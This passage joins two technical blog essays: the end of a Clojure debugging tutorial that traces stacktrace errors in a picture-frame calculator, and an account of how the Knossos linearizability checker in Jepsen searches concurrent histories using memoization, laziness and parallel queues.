         (concat (spares segments))
         ; Include a cut between each segment
         (interpose cut-size)
         ; And sum the whole shebang.
         (reduce +))))

(->> [{:x 8, :y 10}
      {:x 10, :y 8}
      {:x 20, :y 30}]
     (total-wood 2)
     (println "total inches:"))

Running this program yields a curious stacktrace. We’ll print the full trace (not the shortened one that comes with pst) for the last exception *e with the .printStackTrace function.

user=> (.printStackTrace *e)
java.lang.ClassCastException: clojure.lang.PersistentArrayMap cannot be cast to java.lang.Number, compiling:(scratch/debugging.clj:73:23)
    at clojure.lang.Compiler.load(Compiler.java:7142)
    at clojure.lang.RT.loadResourceScript(RT.java:370)
    at clojure.lang.RT.loadResourceScript(RT.java:361)
    at clojure.lang.RT.load(RT.java:440)
    at clojure.lang.RT.load(RT.java:411)
    ...
    at java.lang.Thread.run(Thread.java:745)
Caused by: java.lang.ClassCastException: clojure.lang.PersistentArrayMap cannot be cast to java.lang.Number
    at clojure.lang.Numbers.multiply(Numbers.java:146)
    at clojure.lang.Numbers.multiply(Numbers.java:3659)
    at scratch.debugging$frame.invoke(debugging.clj:26)
    at clojure.lang.AFn.applyToHelper(AFn.java:156)
    at clojure.lang.AFn.applyTo(AFn.java:144)
    at clojure.core$apply.invoke(core.clj:626)
    at clojure.core$partial$fn__4228.doInvoke(core.clj:2468)
    at clojure.lang.RestFn.invoke(RestFn.java:408)
    at clojure.core$map$fn__4245.invoke(core.clj:2557)
    at clojure.lang.LazySeq.sval(LazySeq.java:40)
    at clojure.lang.LazySeq.seq(LazySeq.java:49)
    at clojure.lang.RT.seq(RT.java:484)
    at clojure.core$seq.invoke(core.clj:133)
    at clojure.core$map$fn__4245.invoke(core.clj:2551)
    at clojure.lang.LazySeq.sval(LazySeq.java:40)
    at clojure.lang.LazySeq.seq(LazySeq.java:49)
    at clojure.lang.RT.seq(RT.java:484)
    at clojure.core$seq.invoke(core.clj:133)
    at clojure.core$apply.invoke(core.clj:624)
    at clojure.core$mapcat.doInvoke(core.clj:2586)
    at clojure.lang.RestFn.invoke(RestFn.java:423)
    at scratch.debugging$total_wood.invoke(debugging.clj:62)
    ...

First: this trace has two parts. The top-level error (a CompilerException) appears first, and is followed by the exception that caused it: a ClassCastException. This makes the stacktrace read somewhat out of order, since the deepest part of the trace occurs in the first line of the last exception: we read the Caused by block top-down first, then return to the enclosing exception’s frames. This is an old convention in the Java runtime, and the cause of no end of frustration.

Notice that this representation of the stacktrace is less friendly than (pst). We’re seeing the Java Virtual Machine (JVM)’s internal representation of Clojure functions, which look like clojure.core$partial$fn__4228.doInvoke. This corresponds to the namespace clojure.core, in which there is a function called partial, inside of which is an anonymous function, here named fn__4228. Calling a Clojure function is written, in the JVM, as .invoke or .doInvoke.

So: the root cause was a ClassCastException, and it tells us that Clojure expected a java.lang.Number, but found a PersistentArrayMap. We might guess that PersistentArrayMap is something to do with the map data structure, which we used in this program:

user=> (type {:x 1})
clojure.lang.PersistentArrayMap

And we’d be right. We can also tell, by reading down the stacktrace looking for our scratch.debugging namespace, where the error took place: scratch.debugging$frame, on line 26.

(let [margin (* 2 rect)]

There’s our multiplication operation *, which we might assume expands to clojure.lang.Numbers.multiply. But the path to the error is odd.

(->> photos
     ; Convert photos to frame dimensions
     (map (partial frame mat-width))

In total-wood, we call (map (partial frame mat-width) photos) right away, so we’d expect the stacktrace to go from total-wood to map to frame. But this is not what happens. Instead, total-wood invokes something called RestFn–a piece of Clojure plumbing–which in turn calls mapcat.

    at clojure.core$mapcat.doInvoke(core.clj:2586)
    at clojure.lang.RestFn.invoke(RestFn.java:423)
    at scratch.debugging$total_wood.invoke(debugging.clj:62)

Why doesn’t total-wood call map first? Well it did–but map doesn’t actually apply its function to anything in the photos vector when invoked. Instead, it returns a lazy sequence–one which applies frame only when elements are asked for.

user=> (type (map inc (range 10)))
clojure.lang.LazySeq
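Laziness means even errors are deferred. As a small sketch (the sequence here is illustrative, not part of our frame program), building a lazy sequence over bad input succeeds; the failure only surfaces when something forces an element:

```clojure
;; Constructing the lazy sequence is fine; no division happens yet.
(def xs (map #(/ 1 %) [1 2 0 4]))

;; Only when we force an element does map call our function, and the
;; divide-by-zero finally throws an ArithmeticException.
(nth xs 2)
```

The stacktrace for that exception will point at the place where the sequence was *realized*, not where it was built: exactly the inversion we’re seeing here.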

Inside each LazySeq is a box containing a function. When you ask a LazySeq for its first value, it calls that function to return a new sequence–and that’s when frame gets invoked. What we’re seeing in this stacktrace is the LazySeq internal machinery at work–mapcat asks it for a value, and the LazySeq asks map to generate that value.

    at clojure.core$partial$fn__4228.doInvoke(core.clj:2468)
    at clojure.lang.RestFn.invoke(RestFn.java:408)
    at clojure.core$map$fn__4245.invoke(core.clj:2557)
    at clojure.lang.LazySeq.sval(LazySeq.java:40)
    at clojure.lang.LazySeq.seq(LazySeq.java:49)
    at clojure.lang.RT.seq(RT.java:484)
    at clojure.core$seq.invoke(core.clj:133)
    at clojure.core$map$fn__4245.invoke(core.clj:2551)
    at clojure.lang.LazySeq.sval(LazySeq.java:40)
    at clojure.lang.LazySeq.seq(LazySeq.java:49)
    at clojure.lang.RT.seq(RT.java:484)
    at clojure.core$seq.invoke(core.clj:133)
    at clojure.core$apply.invoke(core.clj:624)
    at clojure.core$mapcat.doInvoke(core.clj:2586)
    at clojure.lang.RestFn.invoke(RestFn.java:423)
    at scratch.debugging$total_wood.invoke(debugging.clj:62)

In fact we pass through map’s laziness twice here: a quick peek at (source mapcat) shows that it expands into a map call itself, and then there’s a second map: the one we created in total-wood. Then an odd thing happens–we hit something called clojure.core$partial$fn__4228.

(map (partial frame mat-width) photos)

The frame function takes two arguments: a mat width and a photo. We wanted a function that takes just one argument: a photo. (partial frame mat-width) took mat-width and generated a new function which takes one arg–call it photo–and calls (frame mat-width photo). That automatically generated function, returned by partial, is what map uses to generate new elements of its sequence on demand.

user=> (partial + 1)
#<core$partial$fn__4228 clojure.core$partial$fn__4228@243634f2>
user=> ((partial + 1) 4)
5

That’s why we see control flow through clojure.core$partial$fn__4228 (an anonymous function defined inside clojure.core/partial) on the way to frame.

Caused by: java.lang.ClassCastException: clojure.lang.PersistentArrayMap cannot be cast to java.lang.Number
    at clojure.lang.Numbers.multiply(Numbers.java:146)
    at clojure.lang.Numbers.multiply(Numbers.java:3659)
    at scratch.debugging$frame.invoke(debugging.clj:26)
    at clojure.lang.AFn.applyToHelper(AFn.java:156)
    at clojure.lang.AFn.applyTo(AFn.java:144)
    at clojure.core$apply.invoke(core.clj:626)
    at clojure.core$partial$fn__4228.doInvoke(core.clj:2468)

And there’s our suspect! scratch.debugging/frame, at line 26. To return to that line again:

(let [margin (* 2 rect)]

* is a multiplication, and 2 is obviously a number, but rect is a map here. Aha! We meant to multiply the mat-width by two, not the rectangle.

(defn frame
  "Given a mat width, and a photo rectangle, figure out the size of the
  frame required by adding the mat width around all edges of the photo."
  [mat-width rect]
  (let [margin (* 2 mat-width)]
    {:x (+ margin (:x rect))
     :y (+ margin (:y rect))}))

I believe we’ve fixed the bug, then. Let’s give it a shot!

The unbearable lightness of nil

There’s one more bug lurking in this program. This one’s stacktrace is short.

user=> (use 'scratch.debugging :reload)

CompilerException java.lang.NullPointerException, compiling:(scratch/debugging.clj:73:23)
user=> (pst)
CompilerException java.lang.NullPointerException, compiling:(scratch/debugging.clj:73:23)
    clojure.lang.Compiler.load (Compiler.java:7142)
    clojure.lang.RT.loadResourceScript (RT.java:370)
    clojure.lang.RT.loadResourceScript (RT.java:361)
    clojure.lang.RT.load (RT.java:440)
    clojure.lang.RT.load (RT.java:411)
    clojure.core/load/fn--5066 (core.clj:5641)
    clojure.core/load (core.clj:5640)
    clojure.core/load-one (core.clj:5446)
    clojure.core/load-lib/fn--5015 (core.clj:5486)
    clojure.core/load-lib (core.clj:5485)
    clojure.core/apply (core.clj:626)
    clojure.core/load-libs (core.clj:5524)
Caused by: NullPointerException
    clojure.lang.Numbers.ops (Numbers.java:961)
    clojure.lang.Numbers.add (Numbers.java:126)
    clojure.core/+ (core.clj:951)
    clojure.core.protocols/fn--6086 (protocols.clj:143)
    clojure.core.protocols/fn--6057/G--6052--6066 (protocols.clj:19)
    clojure.core.protocols/seq-reduce (protocols.clj:27)
    clojure.core.protocols/fn--6078 (protocols.clj:53)
    clojure.core.protocols/fn--6031/G--6026--6044 (protocols.clj:13)
    clojure.core/reduce (core.clj:6287)
    scratch.debugging/total-wood (debugging.clj:69)
    scratch.debugging/eval1560 (debugging.clj:81)
    clojure.lang.Compiler.eval (Compiler.java:6703)

On line 69, total-wood calls reduce, which dives through a series of functions from clojure.core.protocols before emerging in +: the function we passed to reduce. reduce is trying to combine two elements from its collection of wood segments using +, but one of them was nil, and adding nil to a number throws a NullPointerException. In total-wood, we constructed the sequence of segments this way:

  (let [segments (->> photos
                      ; Convert photos to frame dimensions
                      (map (partial frame mat-width))
                      ; Convert frames to segments
                      (mapcat perimeter))]

    ; Now, take segments
    (->> segments
         ; Add the spares
         (concat (spares segments))
         ; Include a cut between each segment
         (interpose cut-size)
         ; And sum the whole shebang.
         (reduce +))))

Where did the nil value come from? The stacktrace doesn’t say, because the sequence reduce is traversing didn’t have any problem producing the nil. reduce asked for a value and the sequence happily produced a nil. We only had a problem when it came time to combine the nil with the next value, using +.

A stacktrace like this is something like a murder mystery: we know the program died in the reducer, that it was shot with a +, and the bullet was a nil–but we don’t know where the bullet came from. The trail runs cold. We need more forensic information–more hints about the nil’s origin–to find the culprit.
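We can at least confirm the weapon at the REPL: adding nil to a number reproduces the same failure, from the same clojure.lang.Numbers.ops frame we saw in the trace.

```clojure
;; Adding nil to a number throws the same NullPointerException we
;; found in the stacktrace (clojure.lang.Numbers.ops).
(+ 1 nil)
```

The exception tells us what died and how, but nothing about where the nil was born.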

Again, this is a class of error that static type systems largely prevent. If you have worked with a statically typed language, it may be interesting to consider that almost every Clojure function implicitly accepts Option[A] and does something more-or-less sensible, returning Option[B]. But whether the error propagates as a nil or an Option, we face a similar difficulty: the value itself tells us nothing about where it originated.

Let’s try printing out the state as reduce goes along:

    (->> segments
         ; Add the spares
         (concat (spares segments))
         ; Include a cut between each segment
         (interpose cut-size)
         ; And sum the whole shebang.
         (reduce (fn [acc x]
                   (prn acc x)
                   (+ acc x))))))

user=> (use 'scratch.debugging :reload)
12 1
13 14
27 1
28 nil

CompilerException java.lang.NullPointerException, compiling:(scratch/debugging.clj:73:56)

Not every value is nil! There’s a 14 there which looks like a plausible segment for a frame, and two one-inch buffers from cut-size. We can rule out interpose because it inserts a 1 every time, and that 1 reduces correctly. But where’s that nil coming from? Is it from segments, or from (spares segments)?

  (let [segments (->> photos
                      ; Convert photos to frame dimensions
                      (map (partial frame mat-width))
                      ; Convert frames to segments
                      (mapcat perimeter))]
    (prn :segments segments)

user=> (use 'scratch.debugging :reload)
:segments (12 14 nil 14 14 12 nil 12 24 34 nil 34)

It is present in segments. Let’s trace it backwards through the sequence’s creation. It’d be handy to have a function like prn that returned its input, so we could spy on values as they flowed through the ->> macro.

(defn spy
  [& args]
  (apply prn args)
  (last args))

  (let [segments (->> photos
                      ; Convert photos to frame dimensions
                      (map (partial frame mat-width))
                      (spy :frames)
                      ; Convert frames to segments
                      (mapcat perimeter))]

user=> (use 'scratch.debugging :reload)
:frames ({:x 12, :y 14} {:x 14, :y 12} {:x 24, :y 34})
:segments (12 14 nil 14 14 12 nil 12 24 34 nil 34)

Ah! So the frames are intact, but the perimeters are bad. Let’s check the perimeter function:

(defn perimeter
  "Given a rectangle, returns a vector of its edge lengths."
  [rect]
  [(:x rect)
   (:y rect)
   (:z rect)
   (:y rect)])

Spot the typo? We wrote :z instead of :x. Since the frame didn’t have a :z field, it returned nil! That’s the origin of our NullPointerException. With the bug fixed, we can re-run and find:

user=> (use 'scratch.debugging :reload)
total inches: 319

Voilà!
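Before moving on, the root cause deserves a note: in Clojure, keyword lookup on a map quietly returns nil for a missing key rather than throwing, which is exactly how this typo slipped through.

```clojure
;; Looking up an absent key returns nil instead of throwing:
(:z {:x 12, :y 14})
;; => nil

;; Supplying a default makes the absence explicit:
(:z {:x 12, :y 14} :not-found)
;; => :not-found
```

Sprinkling defaults (or assertions) at the boundaries where maps enter a function can turn a distant NullPointerException into an immediate, local failure.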

Recap

As we solve more and more problems, we get faster at debugging–at skipping over irrelevant log data, figuring out exactly what input was at fault, knowing what terms to search for, and developing a network of peers and mentors to ask for help. But when we encounter unexpected bugs, it can help to fall back on a family of problem-solving tactics.

We explore the problem thoroughly, localizing it to a particular function, variable, or set of inputs. We identify the boundaries of the problem, carving away parts of the system that work as expected. We develop new notation, maps, and diagrams of the problem space, precisely characterizing it in a variety of modes.

With the problem identified, we search for extant solutions–or related problems others have solved in the past. We trawl through issue trackers, mailing list posts, blogs, and forums like Stackoverflow, or, for more theoretical problems, academic papers, Mathworld, and Wikipedia, etc. If searching reveals nothing, we try rephrasing the problem, relaxing the constraints, adding debugging statements, and solving smaller subproblems. When all else fails, we ask for help from our peers, or from the community in IRC, mailing lists, and so on, or just take a break.

We learned to explore Clojure stacktraces as a trail into our programs, leading to the place where an error occurred. But not all paths are linear, and we saw how lazy operations and higher-order functions create inversions and intermediate layers in the stacktrace. Then we learned how to debug values that were distant from the trace, by adding logging statements and working our way closer to the origin.

Programming languages and us, their users, are engaged in a continual dialogue. We may speak more formally, verbosely, with many types and defensive assertions–or we may speak quickly, generally, in fuzzy terms. The more precise we are with the specifications of our program’s types, the more the program can assist us when things go wrong. Conversely, those specifications harden our programs into strong but rigid forms, and rigid structures are harder to bend into new shapes.

In Clojure we strike a more dynamic balance: we speak in generalities, but we pay for that flexibility. Our errors are harder to trace to their origins. While the Clojure compiler can warn us of some errors, like mis-spelled variable names, it cannot (without a library like core.typed) tell us when we have incorrectly assumed an object will be of a certain type. Even very rigid languages, like Haskell, cannot identify some errors, like reversing the arguments to a subtraction function. Some tests are always necessary, though types are a huge boon.

No matter what language we write in, we use a balance of types and tests to validate our assumptions, both when the program is compiled and when it is run.

The errors that arise in compilation or runtime aren’t rebukes so much as hints. Don’t despair! They point the way towards understanding one’s program in more detail–though the errors may be cryptic. Over time we get better at reading our language’s errors and making our programs more robust.

Earlier versions of Jepsen found glaring inconsistencies, but missed subtle ones. In particular, Jepsen was not well equipped to distinguish linearizable systems from sequentially or causally consistent ones. When people asked me to analyze systems which claimed to be linearizable, Jepsen could rule out obvious classes of behavior, like dropping writes, but couldn’t tell us much more than that. Since users and vendors are starting to rely on Jepsen as a basic check on correctness, it’s important that Jepsen be able to identify true linearization errors.

etcd-jepsen-set-test.jpg

To understand why Jepsen was not a complete test of linearizability, we have to understand the structure of its original tests. Jepsen assumed, originally, that every system could be modeled as a set of integers. Each client would gradually add a sequence of integers–disjoint from all the other client sets–to the database’s set; then perform a final read. If any elements which had supposedly succeeded were missing, we know the system dropped data.

The original Jepsen tests were designed for AP systems, like Riak, without a linear order; using a set is appropriate because its contents are fundamentally unordered, and because addition to the set is associative and idempotent. To test a linearizable system, we implement set addition by performing a compare-and-set, replacing the old set with the current value plus the number being written. If a given CAS was successful, then that element should appear in the final read.
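That write path can be sketched with a Clojure atom standing in for the database’s single register (both the atom and cas-add! are illustrative, not Jepsen’s actual client code):

```clojure
;; A sketch of set-addition via compare-and-set: read the current set,
;; then attempt to CAS in the set plus the new element. A Clojure atom
;; stands in for the database register.
(def register (atom #{}))

(defn cas-add!
  "Returns true if the CAS succeeded, false if another writer won."
  [register x]
  (let [current @register]
    (compare-and-set! register current (conj current x))))

(cas-add! register 5)
;; => true
@register
;; => #{5}
```

If a given CAS reported success, the corresponding element must appear in the final read; a missing element means the database dropped an acknowledged write.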

This does verify sequential consistency, and to varying degrees linearizability, but has limited power. The database may choose, for instance, to delay the visibility of changes, so long as they become visible before the final read. We can’t test operations other than a CAS. We can’t, for instance, test deletions. It’s also not clear how to verify systems like mutexes, queues, or semaphores.

Furthermore, if a test does fail, it’s not clear why. A missing number from the final set might be caused by a problem with that particular CAS–or a CAS executed hours later which happened to destroy the effects of a preceding write. Ideally, we’d like to know exactly why the system failed to linearize. With this in mind, I set out to design a linearizability checker suitable for analyzing both formal models and real software with no internal visibility.

Knossos

In the introduction to Knossos, I couched Knossos as a model checker, motivated by a particular algorithm discussed on the Redis mailing list. This was slightly disingenuous: in fact, I designed Knossos as a model checker for any type of history, including those recorded from real databases. This means that Jepsen can generate a series of random operations, execute them against a database, and verify that the resulting history is valid with respect to some model.

Given a sequence of operations that a database might go through–say, two processes attempting to acquire a mutex:

{:process 1, :type :invoke, :f :acquire, :value nil}
{:process 2, :type :invoke, :f :acquire, :value nil}
{:process 1, :type :ok,     :f :acquire, :value nil}
{:process 2, :type :fail,   :f :acquire, :value "lock failed; already held"}

… and a singlethreaded model of the system, like

(defrecord Mutex [locked?]
  Model
  (step [mutex op]
    (condp = (:f op)
      :acquire (if locked?
                 (inconsistent "already held")
                 (Mutex. true))
      :release (if locked?
                 (Mutex. false)
                 (inconsistent "not held")))))

… Knossos can identify if the given concurrent history linearizes–that is, whether there exists some equivalent history in which every operation appears to take place atomically, in a well-defined order, between the invocation and completion times.

jepsen-model.jpg

Linearizability, like sequential and serializable consistency, requires that every operation take place in some specific order; that there appears to be only one “true” state for the system at any given time. Therefore we can model any linearizable system as a single state, plus a function, called step, which applies an operation to that state and returns a new state.

In Clojure, we represent this model with a simple protocol, called Model, which defines a function (step current-model-state operation), and returns the new state. In our mutex example, there are four possibilities, depending on whether the operation is :acquire or :release, and whether the state locked? is true. If we try to lock an unlocked mutex, we return a new Mutex with the state true. If we try to lock a mutex which is already locked, we return a special kind of state: an inconsistent state.

Inconsistent states allow us to verify that a singlethreaded history is valid. We simply (reduce step initial-state operations); if the result is inconsistent, we know that sequence of operations was prohibited by the model. The model formally expresses our definition of the allowable causal histories.
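As a concrete (if simplified) sketch, here is that whole pipeline for the mutex. The Model protocol matches the description above, but inconsistent is modeled as a plain map here, where Knossos uses a dedicated type:

```clojure
;; A simplified sketch of single-threaded checking. `inconsistent`
;; returns a plain map; Knossos' real version is a distinct record.
(defprotocol Model
  (step [model op] "Applies op to the model, returning the new state."))

(defn inconsistent [msg]
  {:inconsistent? true, :msg msg})

(defrecord Mutex [locked?]
  Model
  (step [mutex op]
    (condp = (:f op)
      :acquire (if locked? (inconsistent "already held") (Mutex. true))
      :release (if locked? (Mutex. false) (inconsistent "not held")))))

;; A legal single-threaded history folds to an ordinary state:
(reduce step (Mutex. false) [{:f :acquire} {:f :release}])
;; => an unlocked Mutex

;; An illegal one folds to an inconsistent state:
(reduce step (Mutex. false) [{:f :acquire} {:f :acquire}])
;; => {:inconsistent? true, :msg "already held"}
```

A fuller version would short-circuit with reduced as soon as an inconsistent state appears, rather than stepping past it.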

The plot thickens

jepsen-histories.jpg

But we don’t have a singlethreaded history to test. We have a multithreaded history, with any number of operations in play concurrently. Each client is invoking, waiting for, and then discovering the result of its operations. Our history contains pairs of :invoke, :ok messages, when an operation succeeds, or :invoke, :fail when the operation is known to not have taken place, or :invoke, :info, when we simply don’t know what happened.

If an operation times out, or the server returns an indeterminate response, we may never find out whether the operation really took place. In the history to the right, process 5 has hung and will never recover. Its operation could take place at any time, even years into the future. In general, a hung process is concurrent with every other subsequent operation.

jepsen-invalid-history.jpg
jepsen-valid-history.jpg

Given a model, we know how to test if a particular sequence of operations is valid. But in a concurrent history, the ordering is ambiguous; each operation could take place at any time between its invocation and completion. One possible interleaving might be read 1, write 1, read 2, write 2, which is obviously incorrect. On the other hand, we could evaluate write 1, read 1, write 2, read 2 instead–which is a valid history for a register. This history is linearizable–but in order to prove that fact, we have to find a particular valid order.

Imagine something like a game of hopscotch: one must land on each cell in turn, always moving from left to right, finding a path in which the model’s constraints hold. Where there are many cells at the same time, finding a path becomes especially difficult. We must consider every possible permutation of those concurrent cells, which is O(n!). That’s the kind of hopscotch that, even when played by computer, makes one re-evaluate one’s life choices.
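To see how quickly this blows up, we can count the possible orders of n concurrent operations:

```clojure
;; n concurrent operations can interleave in n! possible orders.
;; *' auto-promotes to BigInt rather than overflowing.
(defn factorial [n]
  (reduce *' (range 1 (inc n))))

(map factorial [2 4 8 16])
;; => (2 24 40320 20922789888000)
```

Sixteen concurrent operations already admit roughly twenty trillion orderings; brute force is not an option.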

So what do we do, presented with a huge space of possibilities?

Exploit degeneracy

I’m a degenerate sort of person, so my first inclination is to look for symmetries in the state space. The key observation to make is that whether a given operation is valid or not depends solely on the current state of the model, not its history.

step(state, op) -> state'
jepsen-degeneracy.jpg

It doesn’t matter how we got to the state; if you give me two registers containing the value 2, and ask me to apply the same operation to both, we only need to check one of the registers, because the results will be equivalent!

Unlike a formal model-checker or proof assistant, Knossos doesn’t know the structure of the system it’s analyzing; it can’t perform symmetry reduction based on the definition of step. What we can do, however, is look for cases where we come back to the same state and the same future series of operations–and when that occurs, drop all but one of the cases immediately–and this turns out to be equivalent to a certain class of symmetry reduction. In particular, we can compact interchangeable orders like concurrent reads, or writes that lead to the same value, etc. We keep a cache of visited worlds and avoid exploring any that have been seen before.
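A minimal sketch of that cache follows; the field names :index, :model, and :pending are assumptions about the world representation, not Knossos’ exact fields:

```clojure
;; Two worlds are interchangeable when they sit at the same index with
;; the same model state and pending operations; the fixed history that
;; got them there doesn't matter, so we key the cache on only those
;; three fields.
(def seen-worlds (atom #{}))

(defn novel?
  "True the first time we see this equivalence class of worlds."
  [world]
  (let [k (select-keys world [:index :model :pending])]
    (if (contains? @seen-worlds k)
      false
      (do (swap! seen-worlds conj k)
          true))))

(novel? {:index 3, :model {:locked? true}, :pending #{}, :fixed [:a :b :c]})
;; => true
(novel? {:index 3, :model {:locked? true}, :pending #{}, :fixed [:b :a :c]})
;; => false: same state reached via a different history, so prune it.
```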

Laziness

monads.jpg
jepsen-laziness.jpg

Remember, we’re looking for any linearization, not all of them. If we can find a shortcut by not evaluating some highly-branching history, by not taking some expensive path, we can skip huge parts of the search. Like a lightning bolt feeling its way down the path of least resistance, we evaluate only those paths which seem easiest–coming back to the hard ones later. If the history is truly not linearizable, we’re forced to return to those expensive branches and check them, but if the history is valid, we can finish as soon as a single path is found.

Lazy evaluation is all about making control flow explicit instead of implicit. We use a data structure to describe where to explore next, instead of following the normal program flow. In Knossos, we represent the exploration of a particular order of operations as a world, which sits at some index along the multithreaded history. Each world carries with it a fixed history–the specific order of operations that occurred in that possible universe. The fixed history leads to a current model state. Finally, each world has a set of pending operations: operations that have been invoked, but have not yet taken effect.

For example, a world might have a fixed history of lock, unlock, lock, leading to a model state where locked is true, and a second lock attempt might be pending but not yet applied. An unlock operation could arrive and allow the pending lock to take place.

By representing the entire state of the computation as a data structure, we can write a single function that takes a world and explores it, returning a set of potential future worlds. We can explore those worlds in parallel.
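A sketch of that exploration function, with a world as a plain map (these field names are illustrative, not Knossos’ exact representation):

```clojure
;; A world holds the order chosen so far (:fixed), the model state it
;; implies (:model), and the operations invoked but not yet applied
;; (:pending). Exploring a world applies exactly one pending op.
(defn successors
  "Returns the worlds reachable by applying one pending operation."
  [{:keys [fixed model pending]} step]
  (for [op pending]
    {:fixed   (conj fixed op)
     :model   (step model op)
     :pending (disj pending op)}))

;; With a toy model that just counts applied operations, a world with
;; two pending ops yields two successor worlds:
(successors {:fixed [], :model 0, :pending #{:a :b}}
            (fn [model op] (inc model)))
```

Because each successor is just another immutable map, exploration is a pure function from worlds to worlds, which is what makes the parallel search below possible.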

Parallelization

pmap.jpg
jepsen-parallelize.jpg

Because our states are immutable representations of the computation, and the function we use to explore any given state is pure and deterministic, we can trivially parallelize the exploration process. Early versions of Knossos reduced over each operation in the history, applying that operation to every outstanding world by whacking it with a parallel map.

This parallelization strategy has a serious drawback, though: by exploring the state space one index at a time, we effectively perform a breadth-first search. We want to take shortcuts through the state space, running many searches at once. Pure depth-first isn’t right either; instead, we want to explore the worlds with the lowest branching factor, because those worlds are the cheapest to explore.

So instead of exploring the history one operation at a time, we spawn lots of threads and have each consume from a priority queue of worlds, ranked by how awful those worlds are to explore. As each explorer thread discovers new consequent worlds, it inserts them back into the pool. If any thread finds a world that encompasses every operation in the history, we’ve demonstrated the history is linearizable.

We pay some cost in synchronization: queues aren’t cheap, and java.util.concurrent.PriorityBlockingQueue has some particularly nasty contention costs for both enqueues and dequeues. Luckily, the queue will usually contain plenty of elements, so we can stripe it into several subqueues, each with thread affinity. Affinity for each queue reduces lock contention, which dramatically reduces the time threads spend waiting to enqueue or dequeue worlds. When a thread exhausts its local queue, it steals worlds from its neighbors.

This approach costs us some degree of memory locality: transferring records through the queue tends to push them out of the CPU cache. We can tune how far each explorer thread will take a particular world to reduce the locality cost: if work is too chunky, threads can starve awaiting worlds to explore–but if work is too fine-grained, synchronization and cache misses dominate.

Memoization

Making control flow explicit (some might even say monadic) allows us to memoize computation as well. At RICON East in 2013, Margo Seltzer gave a phenomenal talk on automatically parallelizing single-threaded x86 programs. She pointed out that x86 can be thought of as a very large, very complicated function that transforms a bit-vector of all the registers and all of memory into some subsequent state–depending on the instruction pointer, the contents of registers, and so on. It’s a very large value, but if you compress it and make even some modest predictions, you can cache the results of computations that haven’t even happened yet, allowing the program to jump forward when it encounters a known state.

jepsen-memoization.jpg

This works because parallel programs usually don’t change the entire memory space; they often read and write only a small portion of memory. for(i = 0; i < 100; i++) { arr[i]++ }, for instance, independently increments each number in arr. In that sense, the memory space is degenerate outside each particular element. That degeneracy allows speculative execution to have a chance of predicting an equivalent future state of the program: we can increment each number concurrently.
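The same independence shows up directly in Clojure: because each element’s increment is independent of every other, we can hand the work to pmap and let the increments run concurrently.

```clojure
;; Each element's increment is independent, so the loop parallelizes
;; trivially: pmap applies inc to the elements on multiple threads.
(def arr (vec (range 100)))
(def arr' (vec (pmap inc arr)))

(take 5 arr')
;; => (1 2 3 4 5)
```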

In Knossos we have a similarly degenerate state space; all fixed histories may be collapsed so long as the model and pending operations are identical. We also have a speculative and lazy execution strategy: operations are simultaneously explored at various points in the multiverse. Hence we can apply a similar memoization strategy: by caching visited worlds, we can avoid exploring equivalent paths twice.

In fact we don’t even need to store the results of the exploration, simply that we have reached that world. Think of exploring a maze with several friends, all looking for a path through. When anyone reaches a dead end, they can save time for everyone by coloring in the path they took. When someone comes to a branch in the maze, they only take the paths that nobody has colored in. We simply abort any exploration of a world equivalent to one already visited. This optimization is nondeterministic but synchronization-free, allowing memoization checks to be extremely cheap. Even though cache hitrates are typically low, each hit prunes an exponential number of descendant worlds, dramatically reducing runtimes.
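A minimal sketch of that coloring-in, under the assumption that a world’s identity is just its model plus its pending operations (here `explore` is a hypothetical stand-in for the real exploration step):

```clojure
;; Sketch of the visited-world check. Since all fixed histories with
;; the same (model, pending) pair are equivalent, that pair serves as
;; the world's identity. The set is mutable and shared across threads,
;; but requires no locks.
(def visited
  (java.util.concurrent.ConcurrentHashMap/newKeySet))

(defn explore-if-new
  "Explores a world only if no thread has already reached an
  equivalent one. `explore` stands in for the real exploration fn."
  [explore world]
  (let [id (select-keys world [:model :pending])]
    (when (.add visited id)    ; .add returns false if already present
      (explore world))))
```

A second thread arriving at an equivalent world sees `.add` return false and simply abandons that path--the maze corridor has already been colored in.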

Immutability and performance

haskell.jpg

When we explore a world, we’ll typically encounter many branching paths. Given two concurrent writes a and b, we need to explore [], [a], [b], [a b], and [b a], and in turn, each of those worlds will fork into hundreds, then thousands, then millions of consequent worlds. We have to make a lot of copies.

At this point in the essay, Haskell enthusiasts are nodding their heads sagely and muttering things about Coyoneda diffeomorphisms and trendofunctors. Haskell offers excellent support for immutable data structures and parallel execution of pure functions, which would make it an ideal choice for building this kind of checker.

zahn.jpg

But I am, sadly, not a Haskell wizard. When you get right down to it, I’m more of a Clojure Sith Lord. And as it turns out, this is a type of problem that Clojure is also well-suited for. We express the consistency model as a pure function over immutable models, and use Clojure’s immutable maps, vectors, and sets to store the state of each world, its histories, its pending operations, and so on. Forking the world into distinct paths doesn’t require copying the entire state; rather, Clojure uses a reference to the original data structure, and stores a delta on top. We can fork millions of worlds cheaply.
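We can see that structural sharing directly. The world map below is illustrative--Knossos’ real world records carry more state--but the mechanics are the same:

```clojure
;; Forking a world is a delta, not a copy: assoc returns a new map
;; that shares nearly all structure with the original, and the
;; original is left untouched.
(def world {:model   {:locked? false}
            :pending #{}
            :history []})

(def fork-a (assoc world :model {:locked? true}))
(def fork-b (update world :history conj {:process 0 :f :lock}))

(:model world)    ;; => {:locked? false}  (unchanged)
(:model fork-a)   ;; => {:locked? true}
(:history fork-b) ;; => [{:process 0, :f :lock}]
```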

Because worlds are immutable, we can share them freely between threads. Because the functions that explore a world, returning subsequent possible worlds, are pure, we can explore worlds on any thread, at any time, and take advantage of memoization. But in order to execute that search process in parallel, we need that priority queue of worlds-at-the-edge: a fundamentally mutable data structure. The memoizing cache is also mutable: it must be, to share state between threads. We also need some book-keeping state: how far has the algorithm explored; have we reached the end; how large is the cache.

So as a layer atop the immutable core, we make limited use of mutable structures: a striped java.util.concurrent.PriorityBlockingQueue for keeping track of which worlds are up next, a concurrent hashmap to memoize results, Clojure’s atoms for bookkeeping, and some java.util.concurrent.atomic references for primitive CAS. Because this code is wildly nondeterministic, it’s the most difficult portion of Knossos to reason about and debug–yet that nondeterminism is a critical degree of freedom for parallel execution. By broadening the space of allowable execution orders, we reduce the need for inter-core synchronization.

deathstar.jpg

Reducing synchronization is especially important because while I was working on Knossos, Comcast offered me a research grant specifically for Jepsen. As one does when offered unlimited resources by a galactic empire, I thought big.

I used Comcast’s grant to build a 24-core (48 HT) Xeon with 128GB of ECC RAM, effectively demolishing the parallelism and heap barriers that limited earlier verification efforts. Extensive profiling with YourKit (another great supporter of open-source projects) helped reduce the lock and CAS contention that had limited scalability to ~4 cores; a few weeks’ work removed almost all thread stalls and improved performance by two orders of magnitude.

